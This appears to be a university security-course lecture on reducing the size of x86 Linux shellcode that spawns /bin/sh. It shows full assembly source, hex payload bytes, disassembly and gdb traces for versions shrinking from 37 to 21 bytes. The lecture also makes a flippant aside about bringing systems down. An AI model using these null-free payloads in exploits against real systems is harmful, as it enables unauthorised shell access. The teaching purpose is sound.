Lec. 12: Short Shell Code
Table of Contents
1 Reducing the Size of Shell Code
Shell code has three main properties: (1) it executes a system call to open a shell or do some other action; (2) it does not contain null bytes; and (3), it is small. So far, the shell code we've developed is 37 bytes. Let's review that piece of shell code now:
SECTION .text ; Code section global _start ; Make label available to linker _start: ; Standard ld entry point jmp callback ; Jump to the end to get our current address dowork: pop esi ; esi now holds the address of "/bin/sh" xor edx,edx ; edx = 0 (it's also param #3 - NULL) push edx ; args[1] - NULL push esi ; args[0] - "/bin/sh" mov ecx,esp ; Param #2 - address of args array mov ebx,esi ; Param #1 - "/bin/sh" xor eax,eax ; eax = 0 mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call xor ebx,ebx ; Exit code, 0 = normal xor eax,eax ; eax = 0 inc eax ; System call number for exit (1) int 0x80 ; Interrupt 80 hex - invoke system call callback: call dowork ; Pushes the address of "/bin/sh" onto the stack db "/bin/sh",0 ; The program we want to run - "/bin/sh"
To see it's current size, let's compile and use the hexify program to count the number of bytes:
user@si485H-base:demo$ nasm -g -f elf -o long_shell.o long_shell.asm user@si485H-base:demo$ ld -o long_shell long_shell.o user@si485H-base:demo$ ./hexify.sh long_shell \xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00 user@si485H-base:demo$ printf `./hexify.sh long_shell` | wc -c 37
That may seem ok: 37 bytes is pretty short. We can do better, though, because the shorter the shell code the more easily we can drop it as a payload.
1.1 Using the Stack More Effectively
Our first target for reducing the size the shell code is to remove the jmp-call back procedures. Let's look at the objdump of the code to see how many bytes are used:
08048060 <_start>: 8048060: eb 16 jmp 8048078 <callback> 08048062 <dowork>: 8048062: 5e pop esi 8048063: 31 d2 xor edx,edx 8048065: 52 push edx 8048066: 56 push esi 8048067: 89 e1 mov ecx,esp 8048069: 89 f3 mov ebx,esi 804806b: 31 c0 xor eax,eax 804806d: b0 0b mov al,0xb 804806f: cd 80 int 0x80 8048071: 31 db xor ebx,ebx 8048073: 31 c0 xor eax,eax 8048075: 40 inc eax 8048076: cd 80 int 0x80 08048078 <callback>: 8048078: e8 e5 ff ff ff call 8048062 <dowork> 804807d: 2f das 804807e: 62 69 6e bound ebp,QWORD PTR [ecx+0x6e] 8048081: 2f das 8048082: 73 68 jae 80480ec <callback+0x74>
If you look closely at the call
instruction, you see that this takes
5 whole bytes! That's simply too many. Let's look for a way to reduce
this.
1.1.1 Attempt 1
Let's try the strategy where we push all the bytes of the "/bin/sh" onto the stack, one-by-one, and then the stack pointer will be the address of the start of the string. Something like this:
SECTION .text ; Code section global _start ; Make label available to linker _start: xor eax,eax push eax ;\0 push 0x68 ;h push 0x73 ;s push 0x2f ;/ push 0x6e ;n push 0x69 ;i push 0x62 ;b push 0x2f ;/ mov esi,esp ; esp is address of "/bin/sh" xor edx,edx ; edx = 0 (it's also param #3 - NULL) push edx ; args[1] - NULL push esi ; args[0] - "/bin/sh" mov ecx,esp ; Param #2 - address of args array mov ebx,esi ; Param #1 - "/bin/sh" is *esp mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call xor ebx,ebx ; Exit code, 0 = normal xor eax,eax ; eax = 0 inc eax ; System call number for exit (1) int 0x80 ; Interrupt 80 hex - invoke system call
Looking at this, we get the same effect of the jmp-call back to get a position free reference to the string "/bin/sh". Let;s take a look at the objdump to see how this changed things:
Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor eax,eax 8048062: 50 push eax 8048063: 6a 68 push 0x68 8048065: 6a 73 push 0x73 8048067: 6a 2f push 0x2f 8048069: 6a 6e push 0x6e 804806b: 6a 69 push 0x69 804806d: 6a 62 push 0x62 804806f: 6a 2f push 0x2f 8048071: 89 e6 mov esi,esp 8048073: 31 d2 xor edx,edx 8048075: 52 push edx 8048076: 56 push esi 8048077: 89 e1 mov ecx,esp 8048079: 89 f3 mov ebx,esi 804807b: b0 0b mov al,0xb 804807d: cd 80 int 0x80 804807f: 31 db xor ebx,ebx 8048081: 31 c0 xor eax,eax 8048083: 40 inc eax 8048084: cd 80 int 0x80
Looking closely, there are two bytes for every push, and we push 7 items, for 14 bytes. Referring back to the jmp-callback version of the code. There were 12 bytes for the call back and 2 bytes for the jmp, that's 14 byts. We gained nothing!
Worse, let's see if this shell code actually works:
user@si485H-base:demo$ ./push_shell_1 user@si485H-base:demo$
Fail.
To figure out why this shell code doesn't work, we'll have to trace its execution in gdb.
user@si485H-base:demo$ gdb -q push_shell_1 Reading symbols from push_shell_1...done. (gdb) b _start Breakpoint 1 at 0x8048060 (gdb) r Starting program: /home/user/git/si485-binary-exploits/lec/12/demo/push_shell_1 Breakpoint 1, 0x08048060 in _start () (gdb) ds Dump of assembler code for function _start: => 0x08048060 <+0>: xor eax,eax 0x08048062 <+2>: push eax 0x08048063 <+3>: push 0x68 0x08048065 <+5>: push 0x73 0x08048067 <+7>: push 0x2f 0x08048069 <+9>: push 0x6e 0x0804806b <+11>: push 0x69 0x0804806d <+13>: push 0x62 0x0804806f <+15>: push 0x2f 0x08048071 <+17>: mov esi,esp 0x08048073 <+19>: xor edx,edx 0x08048075 <+21>: push edx 0x08048076 <+22>: push esi 0x08048077 <+23>: mov ecx,esp 0x08048079 <+25>: mov ebx,esi 0x0804807b <+27>: mov al,0xb 0x0804807d <+29>: int 0x80 0x0804807f <+31>: xor ebx,ebx 0x08048081 <+33>: xor eax,eax 0x08048083 <+35>: inc eax 0x08048084 <+36>: int 0x80 End of assembler dump. (gdb) x/3x $esp 0xbffff720: 0x00000001 0xbffff847 0x00000000
Looking at the stack at this point, things seem to be going okay. Let's take three steps:
(gdb) ni 3 0x08048065 in _start () (gdb) ds Dump of assembler code for function _start: 0x08048060 <+0>: xor eax,eax 0x08048062 <+2>: push eax 0x08048063 <+3>: push 0x68 => 0x08048065 <+5>: push 0x73 0x08048067 <+7>: push 0x2f 0x08048069 <+9>: push 0x6e 0x0804806b <+11>: push 0x69 0x0804806d <+13>: push 0x62 0x0804806f <+15>: push 0x2f 0x08048071 <+17>: mov esi,esp 0x08048073 <+19>: xor edx,edx 0x08048075 <+21>: push edx 0x08048076 <+22>: push esi 0x08048077 <+23>: mov ecx,esp 0x08048079 <+25>: mov ebx,esi 0x0804807b <+27>: mov al,0xb 0x0804807d <+29>: int 0x80 0x0804807f <+31>: xor ebx,ebx 0x08048081 <+33>: xor eax,eax 0x08048083 <+35>: inc eax 0x08048084 <+36>: int 0x80 End of assembler dump. (gdb) x/3x $esp 0xbffff718: 0x00000068 0x00000000 0x00000001
Ok. Now we have sense of what is going on. Looking closely, you can see that when we pushed 0x68, we didn't push just the byte of 0x68, we push the 4-byte value of 0x00000068. Why?
The stack is always 4-byte aligned. This is to ensure that when you push and pop, you get consistent answers. The thing that you push onto the stack is always popped off the stack. There is no way to push single bytes. It doesn't allow you to get out of alignment, so you must ALWAYS push 4-byte values. But, we can work with that.
1.1.2 Attempt 2
Now that we are a bit more familiar with the stack, we can change our shell code to push the entire byte sequence for "/bin/sh" in two steps.
Problem: "/bin/sh" is 7 bytes long, and we can only push 4 byte sequences! This can be solved with leveraging the file system path constructs. For example, "//bin/sh" is the same as "/bin//sh" which is the same as "/bin/sh".
With that, we have the following shell code:
SECTION .text ; Code section global _start ; Make label available to linker _start: xor eax,eax push eax ;\0 push 0x68732f6e ;n/sh push 0x69622f2f ;//bi mov esi,esp ;esp is argv xor edx,edx ; edx = 0 (it's also param #3 - NULL) push edx ; args[1] - NULL push esi ; args[0] - "/bin/sh" mov ecx,esp ; Param #2 - address of args array mov ebx,esi ; Param #1 - "/bin/sh" is *esp mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call xor ebx,ebx ; Exit code, 0 = normal xor eax,eax ; eax = 0 inc eax ; System call number for exit (1) int 0x80 ; Interrupt 80 hex - invoke system call
Looking closely at the two push commands, we have to be mindful of the order and little-endian.
push 0x68732f6e ;n/sh push 0x69622f2f ;//bi
Note first that the last thing pushed on the stack would be the start of the string sequence. The byte 0x2f is '/', and looking closely at the bytes, you see that the number 0x69622f2f is "ib//" which when reversed in little endian storage, becomes "//bi."
Finally, we still have to NULL terminate the string, so we push onto the stack first zero byte. When it is all said and done, we get the following:
| 0x0 0x0 0x0 0x0 | 0x00000000 | 'n' '/' 's' 's' | 0x68732f6e esp-> | '/' '/' 'b' 'i' | 0x69622f2f '-----------------'
And, we can now use the value of esp
as the start of the "/bin/sh\0"
string.
Let's compile and see if this works:
user@si485H-base:demo$ ld -o push_shell_2 push_shell_2.o user@si485H-base:demo$ ./push_shell_2 $ echo "It worked!" It worked! $
And, we can see how many bytes it is:
user@si485H-base:demo$ printf `./hexify.sh push_shell_2` | wc -c 34
Woohoo! We saved 3 bytes.
1.2 Removing Crud from the Shell Code
The next place to turn our frugal eyes upon is the extra bit of crud
in the shell code. In particular, let's start by removing the exit
system call. Why do we need to exit cleanly from our shell code if we
fail to execve? Who cares? We are trying to bring down the systems and
a bit of segfaulting here and there is ok by me.
The second item we want to focus on is the execve()
call itself. It
turns out that you don't need to do quite as much work for the shell
to execute. Consider this small example program:
user@si485H-base:demo$ cat small_execve.c #include <unistd.h> int main(){ execve("/bin/sh",NULL,NULL); }
Notice, in this is execve
call there is no argv
array. We just
leave this NULL, which is not preferred but still works. Essentially,
you are indicating that you do not want any arguments at all, but
execve
is smart enough to fix this for you later. In fact, running
this program works fine:
user@si485H-base:demo$ gcc small_execve.c -o small_execve small_execve.c: In function ‘main’: small_execve.c:4:3: warning: null argument where non-null required (argument 2) [-Wnonnull] execve("/bin/sh",NULL,NULL); ^ user@si485H-base:demo$ ./small_execve $ echo "It Works!" It Works! $
Yes, the compiler complains, but who cares if it works.
With these changes, we are left with the following shell code:
SECTION .text ; Code section global _start ; Make label available to linker _start: xor eax,eax push eax ;\0 push 0x68732f6e ;n/sh push 0x69622f2f ;//bi xor edx,edx ; Parm #3 - NULL xor ecx,ecx ; Param #2 - NULL mov ebx,esp ; Param #1 - "/bin/sh" is *esp mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call
And we can compile and test:
user@si485H-base:demo$ nasm -f elf smaller_shell.asm -o smaller_shell.o user@si485H-base:demo$ ld smaller_shell.o -o smaller_shell user@si485H-base:demo$ ./smaller_shell $ echo "It Works!" It Works! $ user@si485H-base:demo$ printf `./hexify.sh smaller_shell` | wc -c 23
Now we are at 23 bytes! Wow, but believe it or not, we can still do 2 bytes better.
1.3 Zeroing Out Better
The last place to gain an advantage, and it is a small one is in the
process of zeroing bytes. There are a number of instructions that are
designed to deal with 8-byte arithmetic by using multiple registers
to store the results of values that overflow 4-byte numbers. The
instruction we will concern ourselves with is the mul
instruction.
The mul
instruction has the following form:
mul reg
It will:
- Multiple the value in
reg
with the value currently ineax
- The result will be stored with the lower 4-bytes in
eax
and the upper 4-bytes inedx
What does this imply? Well, if we multiple where the value in the
registers is zero, then eax
will be zero AND edx
will be zero. The
mul
instruction is just two bytes, and using that two bytes, we can
do two zero'ing, saving us two bytes overall.
Here's the resulting shell code:
user@si485H-base:demo$ cat smallest_shell.asm SECTION .text ; Code section global _start ; Make label available to linker _start: xor ecx,ecx mul ecx ;0's edx and and eax push eax ;\0 push 0x68732f6e ;n/sh push 0x69622f2f ;//bi mov ebx,esp ; Param #1 - "/bin/sh" is *esp mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call
If you look at the two instructions at the top:
xor ecx,ecx mul ecx
First, by zeroing out ecx
, and then doing mul ecx
, we multiple the
value in eax
by zero and store zero in both eax
and edx
.
We can show that this shell code does work and see how many bytes it is:
user@si485H-base:demo$ nasm -f elf smallest_shell.asm -o smallest_shell.o user@si485H-base:demo$ ld smallest_shell.o -o smallest_shell user@si485H-base:demo$ ./smallest_shell $ echo "It Works!" It Works! $ user@si485H-base:demo$ printf `./hexify.sh smallest_shell` | wc -c 21
We are now at 21 bytes! And, that's about as small as it can get. I haven't seen any examples much smaller than this that work consistently.